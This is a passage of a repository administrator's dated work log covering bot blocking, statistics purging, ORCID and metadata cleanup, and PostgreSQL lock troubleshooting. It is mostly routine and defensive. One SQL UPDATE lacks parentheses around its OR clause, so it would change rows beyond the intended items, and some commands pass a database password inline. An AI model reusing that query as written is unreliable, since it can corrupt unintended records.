+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/<span style="color:#f92672">{</span>rest,access,library-access,oai<span style="color:#f92672">}</span>.log /var/log/nginx/<span style="color:#f92672">{</span>rest,access,library-access,oai<span style="color:#f92672">}</span>.log.1 /var/log/nginx/<span style="color:#f92672">{</span>rest,access,library-access,oai<span style="color:#f92672">}</span>.log.<span style="color:#f92672">{</span>2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25<span style="color:#f92672">}</span>.gz | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2023-01-17-cgspace-ips.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/2023-01-17-cgspace-ips.txt 
+</span></span><span style="display:flex;"><span>129446 /tmp/2023-01-17-cgspace-ips.txt
+</span></span></code></pre></div><ul>
+<li>I ran the IPs through my <code>resolve-addresses-geoip2.py</code> script to resolve their ASNs/networks, then extracted some lists of data center ISPs by eyeballing them (Amazon, Google, Microsoft, Apple, DigitalOcean, HostRoyale, and a dozen others):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(8075|714|16276|15169|23576|24940|13238|32934|14061|12876|55286|203020|204287|7922|50245|6939|16509|14618)$&#39;</span> <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  /tmp/2023-01-17-cgspace-ips.csv | csvcut -c network | \
+</span></span><span style="display:flex;"><span>  sed 1d | sort | uniq &gt; /tmp/networks-to-block.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/networks-to-block.txt 
+</span></span><span style="display:flex;"><span>776 /tmp/networks-to-block.txt
+</span></span></code></pre></div><ul>
+<li>I added the list of networks to nginx&rsquo;s <code>bot-networks.conf</code> so they will all be heavily rate limited</li>
+<li>Looking at the Munin stats again I see the load has been extra high since yesterday morning:</li>
+</ul>
+<p><img src="/cgspace-notes/2023/01/cpu-week.png" alt="CPU week"></p>
+<ul>
+<li>But still, it&rsquo;s suspicious that there are so many PostgreSQL locks</li>
+<li>Looking at the Solr stats to check the hits the last month (actually I skipped December because I was so busy)
+<ul>
+<li>I see 31.148.223.10 is on ALFA TELECOM s.r.o. in Russia and it made 43,000 requests this month (and 400,000 more last month!)</li>
+<li>I see 18.203.245.60 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 3.249.192.212 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 34.244.160.145 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 52.213.59.101 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 91.209.8.29 is in Bulgaria on DGM EOOD and is low risk according to Scamlytics, but their user agent is all lower case and it&rsquo;s a data center ISP so nope</li>
+<li>I see 54.78.176.127 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 54.246.128.111 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 54.74.197.53 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 52.16.103.133 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 63.32.99.252 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 176.34.141.181 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 34.243.17.80 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 34.240.206.16 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 18.203.81.120 is on Amazon and it uses weird user agents, different with each request</li>
+<li>I see 176.97.210.106 is on Tube Hosting and is rate VERY BAD, malicious, scammy on everything I checked</li>
+<li>I see 79.110.73.54 is on ALFA TELCOM / Serverel and is using a different, weird user agent with each request</li>
+<li>There are too many to count&hellip; so I will purge these and then move on to user agents</li>
+</ul>
+</li>
+<li>I purged hits from those IPs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 439185 hits from 31.148.223.10 in statistics
+</span></span><span style="display:flex;"><span>Purging 2151 hits from 18.203.245.60 in statistics
+</span></span><span style="display:flex;"><span>Purging 1990 hits from 3.249.192.212 in statistics
+</span></span><span style="display:flex;"><span>Purging 1975 hits from 34.244.160.145 in statistics
+</span></span><span style="display:flex;"><span>Purging 1969 hits from 52.213.59.101 in statistics
+</span></span><span style="display:flex;"><span>Purging 2540 hits from 91.209.8.29 in statistics
+</span></span><span style="display:flex;"><span>Purging 1624 hits from 54.78.176.127 in statistics
+</span></span><span style="display:flex;"><span>Purging 1236 hits from 54.74.197.53 in statistics
+</span></span><span style="display:flex;"><span>Purging 1327 hits from 54.246.128.111 in statistics
+</span></span><span style="display:flex;"><span>Purging 1108 hits from 52.16.103.133 in statistics
+</span></span><span style="display:flex;"><span>Purging 1045 hits from 63.32.99.252 in statistics
+</span></span><span style="display:flex;"><span>Purging 999 hits from 176.34.141.181 in statistics
+</span></span><span style="display:flex;"><span>Purging 997 hits from 34.243.17.80 in statistics
+</span></span><span style="display:flex;"><span>Purging 985 hits from 34.240.206.16 in statistics
+</span></span><span style="display:flex;"><span>Purging 862 hits from 18.203.81.120 in statistics
+</span></span><span style="display:flex;"><span>Purging 1654 hits from 176.97.210.106 in statistics
+</span></span><span style="display:flex;"><span>Purging 1628 hits from 51.81.193.200 in statistics
+</span></span><span style="display:flex;"><span>Purging 1020 hits from 79.110.73.54 in statistics
+</span></span><span style="display:flex;"><span>Purging 842 hits from 35.153.105.213 in statistics
+</span></span><span style="display:flex;"><span>Purging 1689 hits from 54.164.237.125 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 466826
+</span></span></code></pre></div><ul>
+<li>Looking at user agents in Solr statistics from 2022-12 and 2023-01 I see some weird ones:
+<ul>
+<li><code>azure-logic-apps/1.0 (workflow e1f855704d6543f48be6205c40f4083f; version 08585300079823949478) microsoft-flow/1.0</code></li>
+<li><code>Gov employment data scraper ([[your email]])</code></li>
+<li><code>Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?LinkID=304225)</code></li>
+<li><code>crownpeak</code></li>
+<li><code>Mozilla/5.0 (compatible)</code></li>
+</ul>
+</li>
+<li>Also, a ton of them are lower case, which I&rsquo;ve never seen before&hellip; it might be possible, but looks super fishy to me:
+<ul>
+<li><code>mozilla/5.0 (x11; ubuntu; linux x86_64; rv:84.0) gecko/20100101 firefox/86.0</code></li>
+<li><code>mozilla/5.0 (macintosh; intel mac os x 11_3) applewebkit/537.36 (khtml, like gecko) chrome/89.0.4389.90 safari/537.36</code></li>
+<li><code>mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36</code></li>
+<li><code>mozilla/5.0 (windows nt 10.0; win64; x64; rv:86.0) gecko/20100101 firefox/86.0</code></li>
+<li><code>mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/90.0.4430.93 safari/537.36</code></li>
+<li><code>mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/92.0.4515.159 safari/537.36</code></li>
+<li><code>mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/88.0.4324.104 safari/537.36</code></li>
+<li><code>mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36</code></li>
+</ul>
+</li>
+<li>I purged some of those:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
+</span></span><span style="display:flex;"><span>Purging 1658 hits from azure-logic-apps\/1.0 in statistics
+</span></span><span style="display:flex;"><span>Purging 948 hits from Gov employment data scraper in statistics
+</span></span><span style="display:flex;"><span>Purging 786 hits from Microsoft\.Data\.Mashup in statistics
+</span></span><span style="display:flex;"><span>Purging 303 hits from crownpeak in statistics
+</span></span><span style="display:flex;"><span>Purging 332 hits from Mozilla\/5.0 (compatible) in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 4027
+</span></span></code></pre></div><ul>
+<li>Then I ran all system updates on the server and rebooted it
+<ul>
+<li>Hopefully this clears the locks and the nginx mitigation helps with the load from non-human hosts in large data centers</li>
+<li>I need to re-work how I&rsquo;m doing this whitelisting and blacklisting&hellip; it&rsquo;s way too complicated now</li>
+</ul>
+</li>
+<li>Export entire CGSpace to check Initiative mappings, and add nineteen&hellip;</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-01-18">2023-01-18</h2>
+<ul>
+<li>I&rsquo;m looking at all the ORCID identifiers in the database, which seem to be way more than I realized:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=247) to /tmp/2023-01-18-orcid-identifiers.txt;
+</span></span><span style="display:flex;"><span>COPY 4231
+</span></span><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/2023-01-18-orcid-identifiers.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u &gt; /tmp/2023-01-18-orcids.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2023-01-18-orcids.txt
+</span></span><span style="display:flex;"><span>4518 /tmp/2023-01-18-orcids.txt
+</span></span></code></pre></div><ul>
+<li>Then I resolved them from ORCID and updated them in the database:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2023-01-18-orcids.txt -o /tmp/2023-01-18-orcids-names.txt -d
+</span></span><span style="display:flex;"><span>$ ./ilri/update-orcids.py -i /tmp/2023-01-18-orcids-names.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -m <span style="color:#ae81ff">247</span>
+</span></span></code></pre></div><ul>
+<li>Then I updated the controlled vocabulary</li>
+<li>CGSpace became inactive in the afternoon, with a high number of locks, but surprisingly low CPU usage:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>     83 dspaceApi
+</span></span><span style="display:flex;"><span>   7829 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>In the DSpace logs I see some weird SQL messages, so I decided to restart PostgreSQL and Tomcat 7&hellip;
+<ul>
+<li>I hope this doesn&rsquo;t cause some issue with in-progress workflows&hellip;</li>
+</ul>
+</li>
+<li>I see another user on Cox in the US (98.186.216.144) crawling and scraping XMLUI with Python
+<ul>
+<li>I will add python to the list of bad bot user agents in nginx</li>
+</ul>
+</li>
+<li>While looking into the locks I see some potential Java heap issues
+<ul>
+<li>Indeed, I see two out of memory errors in Tomcat&rsquo;s journal:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>tomcat7[310996]: java.lang.OutOfMemoryError: Java heap space
+</span></span><span style="display:flex;"><span>tomcat7[310996]: Jan 18, 2023 1:37:03 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
+</span></span></code></pre></div><ul>
+<li>Which explains why the locks went down to normal numbers as I was watching&hellip; (because Java crashed)</li>
+</ul>
+<h2 id="2023-01-19">2023-01-19</h2>
+<ul>
+<li>Update a bunch of ORCID identifiers, Initiative mappings, and regions on CGSpace</li>
+<li>So it seems an IFPRI user got caught up in the blocking I did yesterday
+<ul>
+<li>Their ISP is Comcast&hellip;</li>
+<li>I need to re-work the ASN blocking on nginx, but for now I will just get the ASNs again minus Comcast:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/list/AS714 <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>     https://asn.ipinfo.app/api/text/list/AS16276 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS15169 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS23576 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS24940 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS13238 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS32934 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS14061 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS12876 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS55286 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS203020 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS204287 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS50245 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS6939 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS16509 \
+</span></span><span style="display:flex;"><span>     https://asn.ipinfo.app/api/text/list/AS14618
+</span></span><span style="display:flex;"><span>$ cat AS* | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>18179
+</span></span><span style="display:flex;"><span>$ cat /tmp/AS* | ~/go/bin/mapcidr -a &gt; /tmp/networks.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/networks.txt
+</span></span><span style="display:flex;"><span>5872 /tmp/networks.txt
+</span></span></code></pre></div><h2 id="2023-01-20">2023-01-20</h2>
+<ul>
+<li>A lot of work on CGSpace metadata (ORCID identifiers, regions, and Initiatives)</li>
+<li>I noticed that MEL and CGSpace are using slightly different vocabularies for SDGs so I sent an email to Salem and Sara</li>
+</ul>
+<h2 id="2023-01-21">2023-01-21</h2>
+<ul>
+<li>Export the Initiatives community again to perform collection mappings and country/region fixes</li>
+</ul>
+<h2 id="2023-01-22">2023-01-22</h2>
+<ul>
+<li>There has been a high load on the server for a few days, currently 8.0&hellip; and I&rsquo;ve been seeing some PostgreSQL locks stuck all day:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>     11 dspaceApi
+</span></span><span style="display:flex;"><span>     28 dspaceCli
+</span></span><span style="display:flex;"><span>    981 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>Looking at the locks I see they are from this morning at 5:00 AM, which is the <code>dspace checker-email</code> script
+<ul>
+<li>Last week I disabled the one that ones at 4:00 AM, but I guess I will experiment with disabling this too&hellip;</li>
+<li>Then I killed the PIDs of the locks</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceCli&#39;;&#34;</span> | less -S
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>$ ps auxw | grep <span style="color:#ae81ff">18986</span>
+</span></span><span style="display:flex;"><span>postgres 1429108  1.9  1.5 3359712 508148 ?      Ss   05:00  13:40 postgres: 12/main: dspace dspace 127.0.0.1(18986) SELECT
+</span></span></code></pre></div><ul>
+<li>Also, I checked the age of the locks and killed anything over 1 day:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql &lt; locks-age.sql | grep days | less -S
+</span></span></code></pre></div><ul>
+<li>Then I ran all updates on the server and restarted it&hellip;</li>
+<li>Salem responded to my question about the SDG mismatch between MEL and CGSpace
+<ul>
+<li>We agreed to use a version based on the text of <a href="http://metadata.un.org/sdg/?lang=en">this site</a></li>
+</ul>
+</li>
+<li>Salem is having issues with some REST API submission / updates
+<ul>
+<li>I updated DSpace Test with a recent CGSpace backup and created a super admin user for him to test</li>
+</ul>
+</li>
+<li>Clean and normalize fifty-eight IFPRI records for batch import to CGSpace
+<ul>
+<li>I did a duplicate check and found six, so that&rsquo;s good!</li>
+</ul>
+</li>
+<li>I exported the entire CGSpace to check for missing Initiative mappings
+<ul>
+<li>Then I exported the Initiatives community to check for missing regions</li>
+<li>Then I ran the script to check for missing ORCID identifiers</li>
+<li>Then <em>finally</em>, I started a harvest on AReS</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-23">2023-01-23</h2>
+<ul>
+<li>Salem found that you can actually harvest everything in DSpace 7 using the <a href="https://dspace7test.ilri.org/server/api/discover/browses/title/items?page=1&amp;size=100"><code>discover/browses</code> endpoint</a></li>
+<li>Exported CGSpace again to examine and clean up a bunch of stuff like ISBNs in the ISSN field, DOIs in the URL field, dataset URLs in the DOI field, normalized a bunch of publisher places, fixed some countries and regions, fixed some licenses, etc
+<ul>
+<li>I noticed that we still have &ldquo;North America&rdquo; as a region, but according to UN M.49 that is the continent, which comprises &ldquo;Northern America&rdquo; the region, so I will update our controlled vocabularies and all existing entries</li>
+<li>I imported changes to 1,800 items</li>
+<li>When it finished five hours later I started a harvest on AReS</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-24">2023-01-24</h2>
+<ul>
+<li>Proof and upload seven items for the Rethinking Food Markets Initiative for IFPRI</li>
+<li>Export CGSpace to do some minor cleanups, Initiative collection mappings, and region fixes
+<ul>
+<li>I also added &ldquo;CGIAR Trust Fund&rdquo; to all items with an Initiative in <code>cg.contributor.initiative</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-25">2023-01-25</h2>
+<ul>
+<li>Oh shit, the import last night ran for twelve hours and then died:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Error committing changes to database: could not execute statement
+</span></span><span style="display:flex;"><span>Aborting most recent changes.
+</span></span></code></pre></div><ul>
+<li>I re-submitted a smaller version without the CGIAR Trust Fund changes for now just so we get the regions and other fixes</li>
+<li>Do some work on SAPLING issues for CGSpace, sending a large list of issues we found to the MEL team for items they submitted</li>
+<li>Abenet noticed that the number of items in the Initiatives community appears to have dropped by about 2,000 in the XMLUI
+<ul>
+<li>We looked on AReS and all the items are still there</li>
+<li>I looked in the DSpace log and see around 2,000 messages like this:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2023-01-25 07:14:59,529 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: c9fac1f2-6b2b-4941-8077-40b7b5c936b6 message:missing required field: epersonID
+</span></span><span style="display:flex;"><span>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
+</span></span><span style="display:flex;"><span>        at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
+</span></span><span style="display:flex;"><span>        at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
+</span></span><span style="display:flex;"><span>        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
+</span></span><span style="display:flex;"><span>        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+</span></span><span style="display:flex;"><span>        at org.dspace.core.Context.commit(Context.java:424)
+</span></span><span style="display:flex;"><span>        at org.dspace.core.Context.complete(Context.java:380)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>I filed a ticket with Atmire to ask them</li>
+<li>For now I just did a light Discovery reindex (not the full one) and all the items appeared again</li>
+<li>Submit an issue to MEL GitHub regarding the capitalization of CRPs: <a href="https://github.com/CodeObia/MEL/issues/11133">https://github.com/CodeObia/MEL/issues/11133</a>
+<ul>
+<li>I talked to Salem and he said that this is a legacy thing from when CGSpace was using ALL CAPS for most of its metadata. I provided him with <a href="https://ilri.github.io/cgspace-submission-guidelines/cg-contributor-crp/cg-contributor-crp.txt">our current controlled vocabulary for CRPs</a> and he will update it in MEL.</li>
+<li>On that note, Peter and Abenet and I realized that we still have an old field <code>cg.subject.crp</code> with about 450 values in it, but it has not been used for a few years (they are using the old ALL CAPS CRPs)</li>
+<li>I exported this list of values to lowercase them and move them to <code>cg.contributor.crp</code></li>
+<li>Even if some items end up with multiple CRPs, they will get de-duplicated when I remove duplicate values soon</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/2023-01-25-fix-crp-subjects.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.subject.crp -t correct
+</span></span><span style="display:flex;"><span>$ ./ilri/move-metadata-values.py -i /tmp/2023-01-25-move-crp-subjects.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.subject.crp -t cg.contributor.crp
+</span></span></code></pre></div><ul>
+<li>After fixing and moving them all, I deleted the <code>cg.subject.crp</code> field from the metadata registry</li>
+<li>I realized a smarter way to update the text lang attributes of metadata would be to restrict the query to items that are in the archive and not withdrawn:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> text_lang<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;en_US&#39;</span> <span style="color:#66d9ef">WHERE</span> dspace_object_id <span style="color:#66d9ef">IN</span> (<span style="color:#66d9ef">SELECT</span> uuid <span style="color:#66d9ef">FROM</span> item <span style="color:#66d9ef">WHERE</span> in_archive <span style="color:#66d9ef">AND</span> <span style="color:#66d9ef">NOT</span> withdrawn) <span style="color:#66d9ef">AND</span> text_lang <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">OR</span> text_lang <span style="color:#66d9ef">IN</span> (<span style="color:#e6db74">&#39;en&#39;</span>, <span style="color:#e6db74">&#39;&#39;</span>);
+</span></span></code></pre></div><ul>
+<li>
+<p>I tried that in a transaction and it hung, so I canceled it and rolled back</p>
+</li>
+<li>
+<p>I see some PostgreSQL locks attributed to <code>dspaceApi</code> that were started at <code>2023-01-25 13:40:04.529087+01</code> and haven&rsquo;t changed since then (that&rsquo;s eight hours ago)</p>
+<ul>
+<li>I killed the pid&hellip;</li>
+<li>There were also saw some locks owned by <code>dspaceWeb</code> that were nine and four hours old, so I killed those too&hellip;</li>
+<li>Now Maria was able to archive one submission of hers that was hanging all afternoon, but I still can&rsquo;t run the update on the text langs&hellip;</li>
+</ul>
+</li>
+<li>
+<p>Export entire CGSpace to do Initiative mappings again</p>
+</li>
+<li>
+<p>Started a harvest on AReS</p>
+</li>
+</ul>
+<h2 id="2023-01-26">2023-01-26</h2>
+<ul>
+<li>Export entire CGSpace to do some metadata cleanup on various fields
+<ul>
+<li>I also added &ldquo;CGIAR Trust Fund&rdquo; to all items in the Initiatives community</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-27">2023-01-27</h2>
+<ul>
+<li>Export a list of affiliations in the Initiatives community for Peter, trying a new method to avoid exporting <em>everything</em> from PostgreSQL:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/115087 -f /tmp/2023-01-27-initiatives.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.contributor.affiliation[en_US]&#39;</span> 2023-01-27-initiatives.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | sed -e 1d -e &#39;s/^&#34;//&#39; -e &#39;s/&#34;$//&#39; -e &#39;s/||/\n/g&#39; -e &#39;/^$/d&#39;            \
+</span></span><span style="display:flex;"><span>  | sort | uniq -c | sort -h                                               \
+</span></span><span style="display:flex;"><span>  | awk &#39;BEGIN { FS = &#34;^[[:space:]]+[[:digit:]]+[[:space:]]+&#34; } {print $2}&#39;\
+</span></span><span style="display:flex;"><span>  | sed -e &#39;1i cg.contributor.affiliation&#39; -e &#39;s/^\(.*\)$/&#34;\1&#34;/&#39;           \
+</span></span><span style="display:flex;"><span>  &gt; /tmp/2023-01-27-initiatives-affiliations.csv
+</span></span></code></pre></div><ul>
+<li>The first sed command strips the quotes, deletes empty lines, and splits multiple values on &ldquo;||&rdquo;</li>
+<li>The awk command sets the field separator to something so we can get the second &ldquo;field&rdquo; of the sort command, ie:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    309 International Center for Agricultural Research in the Dry Areas
+</span></span><span style="display:flex;"><span>    412 International Livestock Research Institute
+</span></span></code></pre></div><ul>
+<li>The second sed command adds the CSV header and quotes back</li>
+<li>I did the same for authors and donors and send them to Peter to make corrections</li>
+</ul>
+<h2 id="2023-01-28">2023-01-28</h2>
+<ul>
+<li>Daniel from the Alliance said they are getting an HTTP 401 when trying to submit items to CGSpace via the REST API</li>
+</ul>
+<h2 id="2023-01-29">2023-01-29</h2>
+<ul>
